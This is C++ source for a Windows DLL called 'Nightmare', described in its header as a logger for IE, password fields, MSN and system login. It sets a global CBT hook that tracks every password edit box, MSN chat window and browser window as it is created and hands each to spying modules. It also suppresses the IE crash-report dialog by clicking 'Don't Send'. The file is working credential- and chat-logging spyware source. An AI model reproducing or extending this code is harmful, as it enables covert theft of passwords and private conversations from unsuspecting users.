// MSComAss.cpp : Defines the entry point for the DLL application.
//

/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/29/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "NightmareStdafx.h"
#include "Nightmare.h"
#include "EdtLink.h"
#include "MSNSpook.h"
#include "BrowserPhantom.h"
#include "Toolhelp.h"

//it is for Win2k+
#define _WIN32_WINNT  0x0500
#ifdef _WIN32_IE 
  #undef _WIN32_IE
  #define _WIN32_IE 0x0500
#endif
///////////////////////////////////////////////////////////////////////////////


// Instruct the compiler to put these data variable in 
// its own data section called Shared. We then instruct the 
// linker that we want to share the data in this section 
// with all instances of this application.
#pragma data_seg("Shared")
HHOOK g_hNightmareHook = NULL;          //Global CBT Hook Handle 
HWND  g_hNightmareCallerHwnd = NULL;    //Caller Window Handle, Debug Only
DWORD g_dwNightmareThreadIdCaller = 0;  //Caller Thread ID, Debug Only

HWND  g_hNightmareMSNMainWnd = NULL;
DWORD g_dwActiveChat = 0;  //only useful to a GUI client, a backend logger will deal all chat instance
HWND  g_hNightmareMSNChatWnd[MAX_CONCUR_CHAT] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL};      //Chat Window Handle             //Target MSN Chat Window 
HWND  g_hPwdEdit[MAX_PWD_EDIT] = { NULL, NULL, NULL, NULL, NULL,
                                   NULL, NULL, NULL, NULL, NULL,
								   NULL, NULL, NULL, NULL, NULL,
								   NULL, NULL, NULL, NULL, NULL}; 
                                    //Maximum Track 20 password Edit One Time  

//Tracked Browser default 100!!!!!
HWND g_hBrowserLinkWnd[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
                   NULL, NULL, NULL, NULL, NULL,
                   NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
                   NULL, NULL, NULL, NULL, NULL}; 
#pragma data_seg()

// Instruct the linker to make the Shared section
// readable, writable, and shared.
#pragma comment(linker, "/section:Shared,rws")

//Hook Procedure
LRESULT CALLBACK CBTProc(int nCode, WPARAM wParam, LPARAM lParam);
///////////////////////////////////////////////////////////////////////////////

// Nonshared variables
HINSTANCE g_hinstDll = NULL;

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			g_hinstDll = (HINSTANCE)hModule;
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
    }
/*	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		g_hPwdEdit[i] = NULL;
	}
	for(i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		g_hNightmareMSNChatWnd[i] = NULL;
	}
	g_hNightmareMSNMainWnd = NULL;
*/
    return TRUE;
}

BOOL WINAPI InitNightmare(HWND hCallerHwnd)
{
	// Make sure that the hook is not already installed.
	if(g_hNightmareMSNMainWnd != NULL && IsWindow(g_hNightmareMSNMainWnd) && g_hNightmareHook != NULL)
	{
		::PopMsg(_T("in InitNightmare g_hNightmareHook != NULL && g_hNightmareMSNMainWnd != NULL"));
		return FALSE;
	}

    for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i] != NULL && IsWindow(g_hNightmareMSNChatWnd[i]) && g_hNightmareHook != NULL)
		{
			::PopMsg(_T("in InitNightmare g_hNightmareHook != NULL && g_hNightmareMSNChatWnd[i] != NULL"));
			return FALSE;
		}
	}

	for(i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hPwdEdit[i] != NULL && IsWindow(g_hPwdEdit[i]) && g_hNightmareHook != NULL)
		{
			::PopMsg(_T("in InitNightmare g_hNightmareHook != NULL && g_hPwdEdit != NULL"));
			return FALSE;
		}
	}

    if(g_hNightmareHook != NULL)
	{
		::PopMsg(_T("in InitNightmare g_hNightmareHook != NULL"));
		return FALSE;
	}

    g_hNightmareCallerHwnd = hCallerHwnd;
    g_dwNightmareThreadIdCaller = GetCurrentThreadId();

    // Install the hook on the specified thread
    g_hNightmareHook = SetWindowsHookEx(WH_CBT, CBTProc, g_hinstDll, 0);

    if (g_hNightmareHook != NULL) 
		return TRUE; //Succedded
    
    // Make sure that a hook has been installed.
    ::ReportErr(_T("in InitNightmare -- SetHook return NULL"));
	BOOL b = UnhookWindowsHookEx(g_hNightmareHook);
	if(!b)
	{
		::ReportErr(_T("in InitNightmare -- SetHook Fail->UnsetHook Fail"));
	}
    g_hNightmareHook = NULL;
	return FALSE;
}

BOOL WINAPI ExitNightmare()
{
    if(g_hNightmareHook == NULL) 
	{
		//::ReportErr("in Dll try to Unset a NULL Hook");
		return FALSE;  
	}
	//no use, hook can not re-enter 
	BOOL b =  UnhookWindowsHookEx(g_hNightmareHook);
    if(!b) 
	{
    	//::ReportErr("in Dll-- Unset Hook Failed");
        g_hNightmareHook = NULL;
		return FALSE;  
	}

	g_hNightmareHook = NULL;
	g_hNightmareCallerHwnd = NULL;

    //original idea is the service shut down after all the windows are destroyed, so 
	//the CBTProc will receive the WM_DESTROY of the edit handle, but to be safe you
	//have to avoid the user stop the service, so that you have to free the hook for
	//the windows are still there
    for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hPwdEdit[i] != NULL)
		{
			::ExitEditLink(g_hPwdEdit[i]); //fixed 
		    g_hPwdEdit[i] = NULL;
		}
	}
	for(i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i])
		{
			::ExitMSNSpook(g_hNightmareMSNChatWnd[i]);
			g_hNightmareMSNChatWnd[i] = NULL;
		}
	}
	if(g_hNightmareMSNMainWnd)
	{
		::ExitMSNSpook(g_hNightmareMSNMainWnd);
		g_hNightmareMSNMainWnd = NULL;
	}
	for(i = 0; i < MAX_BROWSER; i++)
	{
		if(::g_hBrowserLinkWnd[i])
		{
			::ExitBrowserLink(g_hBrowserLinkWnd[i]);
            g_hBrowserLinkWnd[i] = NULL;
		}
	}
	return TRUE;
}

/*
 * Hook Codes
 */
//#define HC_ACTION           0
//#define HC_GETNEXT          1
//#define HC_SKIP             2
//#define HC_NOREMOVE         3
//#define HC_NOREM            HC_NOREMOVE
//#define HC_SYSMODALON       4
//#define HC_SYSMODALOFF      5

//#define HCBT_MOVESIZE       0
//#define HCBT_MINMAX         1
//#define HCBT_QS             2
//#define HCBT_CREATEWND      3
//#define HCBT_DESTROYWND     4
//#define HCBT_ACTIVATE       5
//#define HCBT_CLICKSKIPPED   6
//#define HCBT_KEYSKIPPED     7
//#define HCBT_SYSCOMMAND     8
//#define HCBT_SETFOCUS       9

//MSDN says
//At the time of the HCBT_CREATEWND notification,
//the window has been created, but its final size 
//and position may not have been determined and 
//its parent window may not have been established.
//the password dialog poped by IE is the child of the desktop

LRESULT CALLBACK CBTProc(
  int nCode,      // hook code
  WPARAM wParam,  // depends on hook code
  LPARAM lParam   // depends on hook code
)
{
	if(nCode < 0)
		return CallNextHookEx(g_hNightmareHook, nCode, wParam, lParam);

	if(nCode == HCBT_ACTIVATE)
    {
        if(IsIECrashDialog((HWND)wParam))
		{
			//PopMsg(_T("Is IE Crash Dialog"));
			HandleIECrashDialog((HWND)wParam);
		}
	}

	if(nCode == HCBT_DESTROYWND) 
	{
		//Only the parent dialog of the edit will receive destroy message
        HWND hWnd = (HWND)wParam;
		for(int i =0 ; hWnd != NULL && i< MAX_PWD_EDIT; i++)
		{
			if(g_hPwdEdit[i] != NULL)
			{
				HWND hParent = g_hPwdEdit[i];
				while(hParent != NULL)
				{
					//target edit's parent is eing destroyed, free it
					if(hWnd == hParent) 
					{
						::ExitEditLink(g_hPwdEdit[i]);
						g_hPwdEdit[i] = NULL;
     					return CallNextHookEx(g_hNightmareHook, nCode, wParam, lParam);
					}
					HWND hTemp = ::GetParent(hParent);
					hParent = hTemp;
				}
			}
		}

		//If you hooked directly from Application, here will not be reached
		//for we did not get the create event. The create-destroy must be given in pair
		if(GetChatNumber() != 0)
		{
			for(int i = 0; i < MAX_CONCUR_CHAT; i++)
			{
				hWnd = (HWND)wParam; //hWnd is changed?
			    //DWORD td = ::GetWindowThreadProcessId(hWnd, NULL);
                //DWORD td2 = ::GetWindowThreadProcessId(g_hNightmareMSNChatWnd, NULL);

				HWND hParent = ::GetChatWindowHandle(i);
			    while(hParent != NULL)
				{
					if(hWnd == hParent) 
					{
						//PopMsg(_T("kill chat"));
						::ExitMSNSpook(g_hNightmareMSNChatWnd[i]);
						::DeleteChatWindowHandle(GetChatWindowHandle(i));

					    return CallNextHookEx(g_hNightmareHook, nCode, wParam, lParam);
					}
				    HWND hTemp = ::GetParent(hParent);
				    hParent = hTemp;
				}
			}
		}

		if((int)GetBrowserNumber() > 0)
		{
			for(int i = 0; i < MAX_BROWSER; i++)
			{
				hWnd = (HWND)wParam;
                
				HWND hParent = ::GetBrowserWindowHandle(i);
			    while(hParent != NULL)
				{
					if(hWnd == hParent) 
					{
						::ExitBrowserLink(g_hBrowserLinkWnd[i]);
						::DeleteBrowserHandle(GetBrowserWindowHandle(i));
					    return CallNextHookEx(g_hNightmareHook, nCode, wParam, lParam);
					}
				    HWND hTemp = ::GetParent(hParent);
				    hParent = hTemp;
				}
			}
		}

		if((HWND)wParam == g_hNightmareMSNMainWnd)
		{
			g_hNightmareMSNMainWnd = NULL;
			::ExitMSNSpook((HWND)wParam);
		}
	}

	if(nCode == HCBT_CREATEWND)
	{
        
		//wParam  = Handle, lParam = not defined
		if(IsPasswordEdit((HWND)wParam) && InsertPasswordEditArray((HWND)wParam))
		{
			::InitEditLink((HWND)wParam);
		}

		if(IsMSNChat((HWND)wParam)) //Chat Window Pop up
		{
			//If not unhooked  properly, unhook here
			//if(g_hNightmareMSNChatWnd) 
			//{
            //    NotifyFrameChatState((HWND)g_hNightmareMSNChatWnd, 1);
			//	  ::ExitMsg(g_hNightmareMSNChatWnd); 
			//}
			DWORD dwNewIndex = InsertChatWindowHandle((HWND)wParam);
			if(dwNewIndex != -1)
			{
				SetActiveChatWindow((HWND)wParam); //Make It The Active
    			::InitMSNSpook((HWND)wParam);
				//PopMsg(_T("CBT new dwIndex %d "), dwNewIndex);
			}
			else //almost impossible to fail here
			{
				PopMsg(_T("Unable to Insert New Chat, Err Nightmare's CBTProc"));
			}
		}

		if(IsMSNMain((HWND)wParam)) //Messager Start
		{
			g_hNightmareMSNMainWnd = (HWND)wParam;
			::InitMSNSpook(g_hNightmareMSNMainWnd);
		}
		if(::IsBrowser((HWND)wParam))
		{
			DWORD dwIndex = ::InsertBrowserHandle((HWND)wParam);
			if(dwIndex != -1)
			{
				::InitBrowserLink((HWND)wParam);
			}
		}
	}
	return 0; //permit operation
}

///*
// * Edit Control Styles
// */
//#define ES_LEFT             0x0000L
//#define ES_CENTER           0x0001L
//#define ES_RIGHT            0x0002L
//#define ES_MULTILINE        0x0004L
//#define ES_UPPERCASE        0x0008L
//#define ES_LOWERCASE        0x0010L
//#define ES_PASSWORD         0x0020L
//#define ES_AUTOVSCROLL      0x0040L
//#define ES_AUTOHSCROLL      0x0080L
//#define ES_NOHIDESEL        0x0100L
//#define ES_OEMCONVERT       0x0400L
//#define ES_READONLY         0x0800L
//#define ES_WANTRETURN       0x1000L
//#if(WINVER >= 0x0400)
//#define ES_NUMBER           0x2000L
//#endif /* WINVER >= 0x0400 */

BOOL InsertPasswordEditArray(HWND hWnd)
{
    for(int i =0 ; i< MAX_PWD_EDIT; i++)
	{
		if(g_hPwdEdit[i] && ::GetParent(g_hPwdEdit[i]) == ::GetParent(hWnd))
			return FALSE;
	}

    for(i =0 ; i< MAX_PWD_EDIT; i++)
	{
		if(g_hPwdEdit[i] == NULL)
		{
			g_hPwdEdit[i] = hWnd;
			break;
		}
	}
	if(i == MAX_PWD_EDIT) return FALSE;
	return TRUE;
}

BOOL DeletePasswordEditArray(HWND hWnd)
{
	for(int i =0 ; i< MAX_PWD_EDIT; i++)
	{
		if(g_hPwdEdit[i] == hWnd)
		{
			g_hPwdEdit[i] = NULL;
			return TRUE;
		}
	}
	return FALSE;
}

HWND WINAPI GetPasswordEditHandle(DWORD dwIndex)
{
	if(dwIndex < 0 || dwIndex >= MAX_PWD_EDIT) return NULL;
	return g_hPwdEdit[dwIndex];
}

//========================================================

DWORD WINAPI InsertChatWindowHandle(HWND hWnd)
{
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i] == NULL)
		{
			g_hNightmareMSNChatWnd[i] = hWnd;
			return (DWORD)i;
		}
	}
	//almost impossible unless yr Exchange server setting sth special ????
	//MSN global network only support 10 maximum concurrent chat now
	if(i == MAX_CONCUR_CHAT) return -1;
	return -1;
}

DWORD WINAPI DeleteChatWindowHandle(HWND hWnd)
{
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i] == hWnd)
		{
			g_hNightmareMSNChatWnd[i] = NULL;
			return (DWORD)i;
		}
	}
	//almost impossible unless yr Exchange server setting sth special ????
	//MSN global network only support 10 maximum concurrent chat now
	if(i == MAX_CONCUR_CHAT) return -1;
	return -1;
}

DWORD WINAPI GetChatNumber()
{
	DWORD dwRet = 0;
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i]) dwRet++;
	}
	return dwRet;
}

void  CheckChatHandleArray()
{
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i])
		{
			if(::IsWindow(g_hNightmareMSNChatWnd[i]) && IsMSNChat(g_hNightmareMSNChatWnd[i])) 
			{
			}
			else
				g_hNightmareMSNChatWnd[i] = NULL;
		}
	}
}

HWND WINAPI  GetMSNMainHWND()
{
	return g_hNightmareMSNMainWnd;
}

DWORD WINAPI GetActiveChat()
{
	//bound check seems unnessary, just a good habit ~v~
	if((int)g_dwActiveChat < 0 || (int)g_dwActiveChat >= MAX_CONCUR_CHAT)
	{
		g_dwActiveChat = (UINT)-1;
	    return g_dwActiveChat;
	}

	if(g_hNightmareMSNChatWnd[g_dwActiveChat])
		return g_dwActiveChat;
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i]) 
		{
			g_dwActiveChat = i;
			return g_dwActiveChat;
		}
	}
	g_dwActiveChat = (UINT)-1;
	return g_dwActiveChat;
}

BOOL WINAPI SetActiveChat(DWORD dwActive)
{
	if(!g_hNightmareMSNChatWnd[dwActive]) return FALSE;
    g_dwActiveChat = dwActive;
	return TRUE;
}

BOOL WINAPI SetActiveChatWindow(HWND dwActiveWnd)
{
	for(int i = 0; i < MAX_CONCUR_CHAT; i++)
	{
		if(g_hNightmareMSNChatWnd[i] == dwActiveWnd) 
		{
			g_dwActiveChat = i;
			return TRUE;
		}
	}
	return FALSE;
}

HWND WINAPI GetChatWindowHandle(DWORD dwIndex)
{
	if(dwIndex < 0 || dwIndex >= MAX_CONCUR_CHAT)
		return NULL;
	return g_hNightmareMSNChatWnd[dwIndex];
}

//================================================================
// browser part

DWORD InsertBrowserHandle(HWND hWnd)
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(::g_hBrowserLinkWnd[i] == NULL)
		{
			g_hBrowserLinkWnd[i] = hWnd;
			return (DWORD)i;
		}
	}
	if(i == MAX_BROWSER) return -1;
	return -1;
}

DWORD DeleteBrowserHandle(HWND hWnd)
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserLinkWnd[i] == hWnd)
		{
			g_hBrowserLinkWnd[i] = NULL;
			return (DWORD)i;
		}
	}	
	if(i == MAX_BROWSER) return -1;
	return -1;
}

DWORD WINAPI GetBrowserNumber()
{
	DWORD dwRet = 0;
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserLinkWnd[i]) dwRet++;
	}
	return dwRet;
}

void  CheckBrowserHandleArray()
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserLinkWnd[i])
		{
			if(::IsWindow(g_hBrowserLinkWnd[i]) && IsBrowser(g_hBrowserLinkWnd[i])) 
			{
			}
			else
				g_hBrowserLinkWnd[i] = NULL;
		}
	}
}

HWND WINAPI GetBrowserWindowHandle(DWORD dwIndex)
{
	if(dwIndex < 0 || dwIndex >= MAX_BROWSER)
		return NULL;
	return g_hBrowserLinkWnd[dwIndex];
}

BOOL IsIECrashDialog(HWND hWnd)
{
	TCHAR szClassName[64];
	int nRet = GetClassName(hWnd, szClassName, 64);
    if(nRet == 0) return FALSE; //Maybe a long class name, just let it go
	szClassName[nRet] = 0;
	if(::lstrcmpi(szClassName, _T("#32770")) != 0) return FALSE;
	//PopMsg(_T("Find Dialog"));
	//is a dialog
	//have 4 buttons (including 1 check box) and a RichEdit20W
	HWND hRich = ::FindWindowEx(hWnd, NULL, _T("RichEdit20W"), NULL);
	if(!hRich) return FALSE;
	//PopMsg(_T("Have RichEdit"));
    HWND hButton = ::FindWindowEx(hWnd, NULL, _T("Button"), NULL);
	if(!hButton) return FALSE;
	//PopMsg(_T("Have Button"));
    //HWND-->ProcessID-->Exe name
	DWORD dwPID;
	GetWindowThreadProcessId(hWnd, &dwPID);
	    
    CToolhelp th(TH32CS_SNAPALL, dwPID);
    // Show Process details
    PROCESSENTRY32 pe = { sizeof(pe) };
    BOOL fOk = th.ProcessFirst(&pe);
    for (; fOk; fOk = th.ProcessNext(&pe))
	{
		if (pe.th32ProcessID == dwPID)
		{
			//PopMsg(_T("%s"), pe.szExeFile);
			if(::lstrcmpi(pe.szExeFile, _T("_DW15.exe")) == 0) 
				return TRUE;
			else
				return FALSE;
		    break;   // No need to continue looping
		}
	}
	return FALSE;
}

BOOL HandleIECrashDialog(HWND hWnd)
{
	//::ShowWindow(hWnd, SW_HIDE);
	//::MoveWindow(hWnd, -2000, 0, 100, 100, FALSE);
    //Find Check Button, UnCheck It
	HWND hChild = ::FindWindowEx(hWnd, NULL, _T("Button"), NULL);
	while(hChild)
	{
		//Check Box?
		LONG_PTR lStyle = ::GetWindowLongPtr(hChild, GWL_STYLE);
    	if((BS_CHECKBOX  & lStyle) == BS_CHECKBOX)
		{
			//uncheck it 
			::SendMessage(hChild, BM_SETCHECK, BST_UNCHECKED, 0);
		}
		hChild = ::FindWindowEx(hWnd, hChild, _T("Button"), NULL);
	}
	//Find "Don't Send" it is the right-most button OR the first child button
    hChild = ::FindWindowEx(hWnd, NULL, _T("Button"), NULL);
	DWORD btnID = ::GetWindowLong(hChild, GWL_ID);
	::SendMessage(hWnd, WM_COMMAND,
		(WPARAM)MAKELONG((WORD)btnID, BN_CLICKED), 
        (LPARAM)hChild);
	return TRUE;
}